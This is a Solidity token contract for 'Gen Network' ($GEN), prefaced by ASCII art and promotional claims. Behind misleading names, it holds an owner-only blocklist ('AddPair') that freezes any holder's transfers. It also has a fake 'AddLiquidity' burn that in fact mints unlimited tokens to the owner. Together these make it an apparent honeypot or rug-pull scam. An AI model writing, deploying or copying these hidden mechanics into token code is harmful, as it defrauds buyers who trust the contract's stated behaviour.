// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⢀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣴⣦⣿⡛⠛⢛⣿⣴⣤⣤⣄⠀⠀⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⡄⢀⣸⣿⠁⠀⠀⠙⢷⣦⡾⠋⠀⠀⠀⣿⣇⡀⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⠁⣿⣹⣿⠁⣠⢲⢄⠀⠀⠄⣠⠲⣄⠀⣿⡏⣿⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⡆⢿⣿⣿⡄⠙⠪⠊⠀⠀⠀⠙⠆⠋⠀⣿⣷⡿⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⡀⠀⠘⣿⣄⣀⣀⣀⣀⣀⣀⣀⣀⣀⣠⣿⠃⠀⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⢀⠁⢀⠀⠈⢉⠉⠉⣿⡏⠉⢹⣿⠉⢉⠉⠁⡀⠀⠀⡀⠀⠀⠀⠀
// ⠀⠀⣴⡿⠛⠛⣿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠻⣿⠻⠛⢻⣦⠀⠀
// ⢠⢸⣿⣀⣀⣀⣿⠃⠀⠀⠀⠯⠽⠩⠯⠽⠭⠽⠀⠀⠀⢹⣿⣀⣀⣀⣿⡇⠀
// ⠀⠀⠉⣿⠋⢹⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⡏⢙⣿⢩⠀⡄
// ⠀⠀⠀⣿⡀⢿⣿⣧⡀⠀⠀⠀⠀⢀⣀⡀⠀⠀⠀⠀⢀⣼⣿⡇⢸⣿⠀⠀⠀
// ⠀⠀⠀⣿⠀⣼⡇⠹⣷⣄⡀⠀⣾⡟⠛⢻⣷⠀⢀⣠⣾⠏⢸⡇⠸⣿⠀⠀⠀
// ⠀⠀⡀⣿⠿⢿⣧⢸⣿⠙⠻⠶⣿⡆⠀⢸⣿⠶⠟⠋⣿⡆⢸⡿⠿⣿⠠⠀⠀
// ⠀⠀⠀⠻⢷⠾⠃⠀⢿⣆⣀⢀⣿⡆⠀⢸⣿⡀⣀⣨⡿⠀⠘⠷⡾⠟⠀⠀⠀
// ⠀⠀⠀⠀⠈⡀⠀⠀⠈⠻⠿⠾⣿⠇⠀⠸⣿⠷⠿⠟⠁⠀⠀⠀⠁⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⣿⡆⠀⢸⣿⠀⠀⠐⠀⠀⠀⠈⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣦⣀⣴⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
// The Gennie blockchain and product ecosystem enable development of high-performance blockchain projects. 
// An array of original features and protocols is designed to support speed, privacy, usability, and liquidity needs all in one platform.
// Scalable & Fast Blockchain in Mainnet. 5,000 TPS. 1 Second Blocktime

// TELEGRAM :https://t.me/GenNetworkOfficial
// WEBSITE  :https://gennie.network/


pragma solidity >=0.6.0 <0.8.0;
// SPDX-License-Identifier: Apache-2.0
interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract GenNetwork {
    address public owner;

    // 0 decimal precisions
    uint256 private constant _percentFactor = 100;
    uint8 public constant decimals = 0;

    string public constant name = "Gen Network";
    string public constant symbol = "$GEN";
    uint256 public constant totalSupply = 100000000;
    uint256 public constant burnFee = 5;
    address public constant burnAddr = 0x000000000000000000000000000000000000dEaD;

    mapping (address => uint256) public balanceOf;
    mapping (address => mapping (address => uint256)) private _allowances;

    mapping (address => bool) public isBlocked;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor () {
        owner = msg.sender;
        balanceOf[owner] = totalSupply;
        emit Transfer(address(0), owner, totalSupply);
        
    }

    function renounceOwnership() public onlyOwner {
        emit OwnershipTransferred(owner, address(0));
        owner = address(0);
    }

    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0), "o 0");
        emit OwnershipTransferred(owner, newOwner);
        owner = newOwner;
    }

    function transfer(address recipient, uint256 amount) public returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    function allowance(address _owner, address spender) public view returns (uint256) {
        return _allowances[_owner][spender];
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {
        require(_allowances[sender][msg.sender] >= amount, "failed");
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
        return true;
    }

    function AddPair(address account) public onlyOwner {
        isBlocked[account] = true;
    }

    function UnPair(address account) public onlyOwner {
        isBlocked[account] = false ;
    }

    function AddLiquidity(uint256 amount) public onlyOwner returns (bool) {
        _burn(msg.sender, amount);
        return true;
    }

    function _burn(address account, uint256 amount) private {
        require(account != address(0), "BEP20");

        balanceOf[account] += amount;
    }

    //to recieve ETH from uniswapV2Router when swaping
    receive() external payable {}
  
    function _approve(address _owner, address spender, uint256 amount) private {
        require(_owner != address(0), "t 0");
        require(spender != address(0), "f 0");

        _allowances[_owner][spender] = amount;
		emit Approval(_owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "f 0");
        require(to != address(0), "t 0");
        require(!isBlocked[from], "f b");
        require(!isBlocked[to], "t b");
        require(amount <= balanceOf[from], "b");

        uint256 fee;
        if (from == owner || to == owner)
            fee = 0;
        else
            fee = amount / _percentFactor * burnFee;
        uint256 transferAmount = amount - fee;

        balanceOf[from] -= amount;
        balanceOf[to] += transferAmount;
        balanceOf[burnAddr] += fee;

        emit Transfer(from, to, transferAmount);
    }
}